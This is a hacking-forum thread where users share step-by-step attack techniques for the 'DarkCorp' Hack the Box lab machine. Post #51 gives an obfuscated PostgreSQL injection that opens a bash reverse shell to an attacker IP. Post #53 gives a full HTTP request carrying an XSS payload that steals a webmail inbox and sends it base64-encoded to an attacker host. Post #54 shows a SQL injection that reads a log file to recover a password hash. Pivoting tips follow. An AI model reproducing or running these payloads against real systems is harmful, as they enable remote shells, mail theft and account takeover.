Temporary Advertisements:
Ad
Ad
Ad
DarkCorp Hack the Box Season 7 (Windows Insane)
by RedBlock - Saturday February 8, 2025 at 03:32 PM
#51
(Feb 09, 2025, 12:06 AM)hijoxi6719 Wrote:
DO $$
DECLARE
    c text;
BEGIN
    c := CHR(67) || CHR(79) || CHR(80) || CHR(89) ||
        ' (SELECT '''') to program ''bash -c "bash -i >& /dev/tcp/10.10.XX.XX/PORT 0>&1"''';
    EXECUTE c;
END $$;

Reverse shell via SQLi with "WAF" bypass

from search ?
 ...............................
Reply
#52
I have the flask secret key, but I am not able to generate the token to login to the dashboard. Found some files in drip.darkcorp.htb but nthg much to tell me what they expect in the flask token ...

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Reply
#53
(Feb 08, 2025, 08:50 PM)4yhg5y72jffg820j3f Wrote: I think we have to craft an XSS payload that will return the contents of

http://mail.drip.htb/?_task=mail&_action...&_extwin=1

for the support engineer user

You're welcome:

POST /contact HTTP/1.1
Host: drip.htb
Content-Type: application/x-www-form-urlencoded
Content-Length: 485

name=RooT&[email protected]&message=%3Cbody%20title%3D%22bgcolor%3Dfoo%22%20name%3D%22bar%20style%3Danimation%2Dname%3Aprogress%2Dbar%2Dstripes%20onanimationstart%3Dfetch%28%27%2F%3F%5Ftask%3Dmail%26%5Faction%3Dshow%26%5Fuid%3D2%26%5Fmbox%3DINBOX%26%5Fextwin%3D1%27%29%2Ethen%28r%3D%3Er%2Etext%28%29%29%2Ethen%28t%3D%3Efetch%28%60http%3A%2F%2F10%2E10%2E14%2EXX%2Fc%3D%24%7Bbtoa%28t%29%7D%60%29%29%20%20foo%3Dbar%22%3E%0A%20%20Foo%0A%3C%2Fbody%3E&content=html&[email protected]

I only can read the first 3 emails. If I change the _uid= to anything higher then 3 I just get back a 
<div class="boxerror"><h3 class="error-title">SERVER ERROR!</h3><div class="error-text">Could not load message from server.</div></div>

What am I doing wrong? How can I read the email with pw reset token?

Edit:
Ok, got it. The mails get deleted and with spamming pw reset requests I was able to get a reset link with _uid=5
Reply
#54
''; SELECT pg_read_file('/var/log/postgresql/postgresql-15-main.log', 0, 1000000);


MD5 hash at the beginning of the file corresponds to ebelford's SSH password.
Reply
#55
seems like the next step is to use the postgres user to port forward so you can access the windows machine:
172.16.20.1 DC-01 DC-01.darkcorp.htb darkcorp.htb

Guest account is disabled.
Reply
#56
There is one more:

172.16.20.2 - WEB-01.darkcorp.htb
Reply
#57
(Feb 09, 2025, 02:29 AM)4yhg5y72jffg820j3f Wrote: There is one more:

172.16.20.2 - WEB-01.darkcorp.htb

how did you find this one?
Reply
#58
(Feb 09, 2025, 02:31 AM)jonklem Wrote:
(Feb 09, 2025, 02:29 AM)4yhg5y72jffg820j3f Wrote: There is one more:

172.16.20.2 - WEB-01.darkcorp.htb

how did you find this one?

use fscan and ligolo-ng
Reply
#59
guys why nmap not work with proxychians i tried ssh also chisel ??
Reply
#60
Looked at my IPs (ip address) and guessed anything lower than mine...
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [UPDATED] APT-Labs Prolabs Writeup z1ne99 41 5,939 4 hours ago
Last Post: morris
Heart [FREE] HackTheBox All Cheatsheets Tamarisk 61 6,076 6 hours ago
Last Post: NIhaogt
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 441 112,629 Yesterday, 05:51 PM
Last Post: evermore
  [FREE] HackTheBox Dante - complete writeup written by Tamarisk Tamarisk 621 105,937 Yesterday, 03:59 PM
Last Post: user65745747
  How to Hack WiFi password Using PMKID Apvu 9 4,399 Sep 19, 2026, 09:08 PM
Last Post: anonhawk437

Forum Jump:


 Users browsing this forum: